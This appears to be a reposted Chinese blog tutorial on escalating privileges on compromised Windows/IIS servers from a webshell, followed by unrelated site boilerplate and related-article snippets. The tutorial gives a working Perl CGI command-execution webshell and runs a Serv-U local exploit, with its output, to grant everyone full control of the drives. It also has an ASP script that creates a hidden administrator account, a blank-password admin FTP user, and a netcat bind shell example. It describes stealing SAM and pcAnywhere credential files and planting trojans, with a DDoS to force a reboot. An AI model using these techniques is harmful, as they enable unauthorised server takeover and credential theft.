提升权限终极技巧

文章作者:WekweN
本篇文章结合了许多高手提升权限的技巧和自己的一些想法

当我们取得一个webshell时候,下一部要做的就是提升权限

个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
ps: 破解工具本站已提供。请自己Search一下!

2.C:\WINNT\system32\config\
进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside

3.C:\Documents and Settings\All Users\「开始」菜单\程序\
看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限


4.c:\winnt\system32\inetsrv\data\
就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 [url]http://anyhost//cmd.pl?dir[/url]
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
[url]http://anyhost//cmd.pl?c[/url]\perl\bin\su.exe 
返回: 
Serv-u >3.x Local Exploit by xiaolu 

USAGE: serv-u.exe "command" 

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 
现在是 IUSR 权限,提交: 
[url]http://anyhost//cmd.pl?c[/url]\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F" 
[url]http://anyhost//cmd.pl?c[/url]\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F" 
[url]http://anyhost//cmd.pl?c[/url]\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F" 
[url]http://anyhost//cmd.pl?c[/url]\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F" 
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu 

<220 Serv-U FTP Server v5.2 for WinSock ready... 

>USER LocalAdministrator 

<331 User name okay, need password. 

****************************************************** 

>PASS #l@$ak#.lk;0@P 

<230 User logged in, proceed. 

****************************************************** 

>SITE MAINTENANCE 

****************************************************** 

[+] Creating New Domain... 

<200-DomainID=2 

<220 Domain settings saved 

****************************************************** 

[+] Domain xl:2 created 

[+] Creating Evil User 

<200-User=xl 

200 User settings saved 

****************************************************** 

[+] Now Exploiting... 

>USER xl 

<331 User name okay, need password. 

****************************************************** 

>PASS 111111 

<230 User logged in, proceed. 

****************************************************** 

[+] Now Executing: cacls.exe c: /E /T /G everyone:F 

<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员: 

[url]http://anyhost//cmd.pl?c[/url]\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add" 


6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user","WekweN$") 
od.SetPassword "WekweN" <-----密码
od.SetInfo 
Set of=GetObject(oz&"/WekweN$,user") 
oe.Add(of.ADsPath) 
Response.write "WekweN$ 超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\Program Files\Java Web Start\
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。

9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。

等到主机重启或者你ddos逼它重启,来达到权限提升的目的。


总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"

以上是本人的拙见,大家有什么好的方法多多分享 
WekweN 
04.12.12


ps: 看完这个感觉内容和angel的那篇文章差不多。
剑走偏锋——灵巧的旁注攻击 
[url]http://hoky.org/blog/blogview.asp?logID=1676[/url]














本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8525,如需转载请自行联系原作者

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/256963.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

移动设备页面高度不足时min-height 的尴尬处理

移动设备页面高度不足时min-height 的尴尬处理 在做html5的页面时&#xff0c;经常遇到页面内容太少撑不起来整个手机屏幕的高度。 我们经常使用min-height来处理&#xff0c;比如min-height:568px; 对应的是iPhone5 的高度&#xff1b; 而这样iPhone6plus下方就会出现空白。 而…

最优化课堂笔记02:第二章 线性规划

第二章 线性规划&#xff08;重点&#xff1a;单纯形法&#xff09; 1.线性规划问题及其模型&#xff08;重点&#xff1a;标准形式&#xff09; 题型&#xff1a;是否为标准形式&#xff1f;不是的话化为标准形式&#xff01; 1&#xff09;问题的提出 提出问题&#xff1…

客户端是选择Java Swing还是C# Winform

登录 | 注册 mentat的专栏 目录视图摘要视图订阅【专家问答】韦玮&#xff1a;Python基础编程实战专题 【知识库】Swift资源大集合 【公告】博客新皮肤上线啦 快来领福利&#xff1a;C币、机械键盘 客户端是选择Java Swing还是C# Winform 标签&#xff1a; swi…

linux下怎么编译动态库并且调用

样例描述&#xff1a;我有一个main.cpp文件件&#xff0c;add.cpp &#xff0c;add.h &#xff0c;subtract.cpp &#xff0c;subtract.h文件&#xff0c;main.cpp里面调用加法和减法的函数&#xff0c;把加法和减法准备编译成动态库 libalgorithm.so&#xff0c;然后main调用这…

NDK编译错误expected specifier-qualifier-list before...

基于cocos2d-x在win7下开发android程序&#xff0c;一般都会选择先在win32下调试&#xff0c;等最后再在eclipse环境下安装测试到真机上。期间&#xff0c;要使用到cocos2d-x提供的一些简化方案进行NDK编译&#xff08;一般使用gcc)。但是&#xff0c;VISUAL STUDIO 2010 C编译…

学习笔记(28):Python网络编程并发编程-死锁与递归锁

立即学习:https://edu.csdn.net/course/play/24458/296445?utm_sourceblogtoedu 1.死锁&#xff08;Lock()的局限性&#xff09; 知识点&#xff1a;Lock(&#xff09;只能被获得&#xff08;acquire&#xff09;一次&#xff0c;要想再次获得必须释放后才能获得 1)死锁情况…

VScode 快速更改编码格式

1、view下的 Cmmand Palette 下的Change file Encoding simplifiled chinese GB2312

iostat

r/s: 每秒读取的请求数。 w/s: 每秒写入的请求数。 Avgqu-sz: 平均I/O队列长度 Await:平均每次设备I/O操作的等待时间(毫秒) Svctm:平均每次设置I/O操作的服务时间(毫秒)&#xff0c;Svctm越接近Await则说明等待时间少 %util:表示设备的繁忙程度&#xff0c;80%表示设备设备已经…

学习笔记(29):Python网络编程并发编程-信号量

立即学习:https://edu.csdn.net/course/play/24458/296446?utm_sourceblogtoedu 信号量&#xff08;了解&#xff09;&#xff1a;也是一把锁semaphore 1. from threading import Thread,Semaphore,currentThread import time#定义信号量(3把锁) sm Semaphore(3)def task()…

Ajax基础2

什么是服务器 网页浏览过程的分析 如何配置自己的服务器程序&#xff08;AMP&#xff09; 什么是Ajax 无刷新数据读取 异步&#xff0c;同步 Ajax基础(2) 使用Ajax 基础请求显示txt的文件 字符集编码 缓存&#xff0c;阻止缓存 动态数据&#xff0c;请求js或&#xff08;json&a…

动态SQL应用(成绩排名)

Code-- 年级排名和班级排名declare sql varchar(4000),nclassid int,nexamid int select sql select nclassid38 select nexamid19select sqlsqlmax(case scoursename when scoursename then descore else 0 end) scoursename,from (select distinct scoursename from t_card_…

《将进酒》——李白

君不见&#xff0c;黄河之水天上来&#xff0c;奔流到海不复回。 君不见&#xff0c;高堂明镜悲白发&#xff0c;朝如青丝暮成雪。 人生得意寻尽欢&#xff0c;莫使金樽空对月。 天生我材必有用&#xff0c;千金散尽还复来。 烹羊宰牛且为乐&#xff0c;会须一饮三百杯。 岑夫子…

关于windows上的exe可执行程序在黑色窗口运行时候不能点击屏幕,要不然会暂定程序

关于windows上的exe可执行程序在黑色窗口运行时候不能点击屏幕&#xff0c;要不然会暂定程序 2019-12-3 记录

学习笔记(30):Python网络编程并发编程-Event事件

立即学习:https://edu.csdn.net/course/play/24458/296447?utm_sourceblogtoedu threading.Event事件 1.概念及功能&#xff1a;主要是完成线程之间的通信&#xff0c;将另一个线程的运行状态通知给另一个线程 2.使用场景&#xff1a; 1&#xff09;客户端运行时等待服务器启…

Java操作ftp,上传,下载,删除操作

使用java commons net包中的api可以方便操作ftp操作。 import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;import org.apache.commons.net.ftp.F…

Dynagen0.11+Pemuwrapper入手麻烦二三事——告诉初学者直路

Dynagen在数度难产后终于诞生了0.11版本&#xff0c;这是个里程碑似的版本&#xff0c;他整合了confDynagen和Pemuwrapper&#xff0c;使得我们在搭建复杂安全环境下的拓扑变得更容易和易于调整。confDynagen的具体介绍这里就从略了&#xff0c;我们着重看下Pemuwrapper的问题。…

第五部分 一阶逻辑等值演算与推理

目录 基本等值式 例1 将下面命题用两种形式符号化, 并证明两者等值: 例2 将公式化成等值的不含既有约束出现、又有自由出现 例3 设个体域D{a,b,c}, 消去下述公式中的量词: 例4 求下列公式的前束范式 推理的形式结构 定义5.3 自然推理系统 构造推理证明的实例 例5 在自然推理系…

从易到难,写一个JavaScript加载器之一

先上代码: 1 (function(global) {2 var createScript, insertScript, makeLoadQueue;3 createScript function(src) {4 var script;5 script document.createElement(SCRIPT);6 script.src "" src ".js";7 return script;8 };9…

关于怎么怎么把 unsingned char 数据转换为 Opencv 的Mat类型,并且吧图像显示出来

1、定义 unsignde char* A; 2、定义cv::Mat B(cv::Size(800,500),CV_8U) 3、使用c语言的 memcpy(B.data, A&#xff0c;800*500)//将A指针的数据复制到B中的数据内存&#xff0c;并且给出内存大小 4最后unsignde char 类型数据就会被转化为Mat类型&#xff0c;并且可以显示出…

学习笔记(31):Python网络编程并发编程-定时器

立即学习:https://edu.csdn.net/course/play/24458/296448?utm_sourceblogtoedu 定时器&#xff1a;threading.Timer 1.概念&#xff1a;定时器就是实现过多久去执行什么事情 2.相关函数 1&#xff09;Timer(self,interval,function,args()) interval:定时的时间 functio…